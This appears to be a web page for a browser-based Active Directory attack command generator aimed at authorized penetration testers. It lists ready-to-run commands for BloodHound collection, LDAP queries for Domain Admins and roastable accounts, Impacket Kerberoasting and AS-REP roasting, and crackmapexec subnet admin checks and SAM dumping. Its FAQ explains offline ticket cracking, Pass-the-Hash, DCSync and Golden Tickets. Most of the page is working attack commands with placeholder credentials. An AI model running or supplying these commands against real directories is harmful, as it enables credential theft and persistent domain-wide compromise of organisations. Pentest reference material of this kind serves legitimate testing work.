Enter your target AD environment details to generate customized attack commands for authorized penetration testing.
# SharpHound (from Windows domain-joined or with creds): .\SharpHound.exe -c All --domain corp.local --ldapusername jsmith --ldappassword Password123! # BloodHound.py (from Linux with creds): python3 bloodhound.py -d corp.local -u jsmith -p 'Password123!' -ns 10.10.10.100 -c All bloodhound-python -d corp.local -u jsmith -p 'Password123!' --dc 10.10.10.100 -c all --zip # Enum4linux-ng (general AD enumeration): enum4linux-ng -A -u jsmith -p 'Password123!' 10.10.10.100 # ldapdomaindump: python3 ldapdomaindump.py -u 'corp.local\jsmith' -p 'Password123!' 10.10.10.100
# List domain users: ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(objectClass=user)" sAMAccountName # Find Domain Admins: ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(memberOf=CN=Domain Admins,CN=Users,DC=corp,DC=local)" sAMAccountName # Find SPNs (Kerberoastable accounts): ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName # Find accounts with pre-auth disabled (AS-REP Roastable): ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName
# GetADUsers.py — list all domain users: python3 GetADUsers.py -all corp.local/jsmith:'Password123!' -dc-ip 10.10.10.100 # GetUserSPNs.py — find Kerberoastable accounts: python3 GetUserSPNs.py corp.local/jsmith:'Password123!' -dc-ip 10.10.10.100 # GetNPUsers.py — find AS-REP Roastable accounts: python3 GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip 10.10.10.100 -no-pass # rpcdump.py — enumerate RPC services: python3 rpcdump.py -port 135 10.10.10.100
# Enumerate shares: crackmapexec smb 10.10.10.100 -u jsmith -p 'Password123!' --shares # Enumerate users: crackmapexec smb 10.10.10.100 -u jsmith -p 'Password123!' --users # Check for local admin access on subnet: crackmapexec smb 10.10.10.0/24 -u jsmith -p 'Password123!' # Dump SAM database (if local admin): crackmapexec smb 10.10.10.100 -u jsmith -p 'Password123!' --sam
It is a command or ticket that abuses Kerberos and NTLM authentication to move through a Windows domain, such as a Kerberoasting request, an AS-REP roast, or a forged Golden Ticket. The Active Directory generator builds these as ready-to-run Rubeus, Impacket, and Mimikatz commands for authorized internal pentests.
Pick the Kerberoasting option to produce commands that request TGS tickets for accounts with a ServicePrincipalName, for example Rubeus kerberoast or Impacket GetUserSPNs.py. The encrypted ticket portion is then cracked offline with Hashcat mode 13100, so weak service-account passwords fall without ever touching the domain controller.
Pass-the-Hash reuses a captured NTLM hash to authenticate without the plaintext password. DCSync impersonates a domain controller via the DRSUAPI replication right to pull the KRBTGT hash. With that hash a Golden Ticket forges arbitrary TGTs, granting persistent domain-wide access until KRBTGT is rotated twice.
Yes. The Active Directory generator is completely free and runs 100% in your browser, so no domain names, hashes, or commands you enter are ever sent to a server. Use it only against directories you are explicitly authorized to test.